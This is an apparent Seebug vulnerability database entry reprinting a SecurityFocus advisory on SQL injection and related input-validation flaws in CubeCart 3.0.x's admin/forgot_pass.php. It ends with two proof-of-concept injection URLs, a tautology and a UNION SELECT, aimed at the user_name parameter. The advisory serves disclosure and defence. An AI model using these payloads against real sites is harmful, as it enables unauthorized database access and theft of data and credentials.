Lucene search

K
seebugRootSSV:82248
HistoryJul 01, 2014 - 12:00 a.m.

CubeCart 3.0.x admin/forgot_pass.php user_name Parameter SQL Injection

2014-07-0100:00:00
Root
www.seebug.org
9

No description provided by source.


                                                source: http://www.securityfocus.com/bid/20215/info

CubeCart is prone to multiple input-validation vulnerabilities, including information-disclosure, cross-site scripting, and SQL-injection issues, because the application fails to properly sanitize user-supplied input. 

A successful exploit of these vulnerabilities could allow an attacker to compromise the application, access or modify data, steal cookie-based authentication credentials, or even exploit vulnerabilities in the underlying database implementation. Other attacks are also possible.

http://www.example.com/admin/forgot_pass.php?submit=1&user_name=-1'or%201=1/*
http://www.example.com/admin/forgot_pass.php?submit=1&user_name=-1'%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,
23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42/*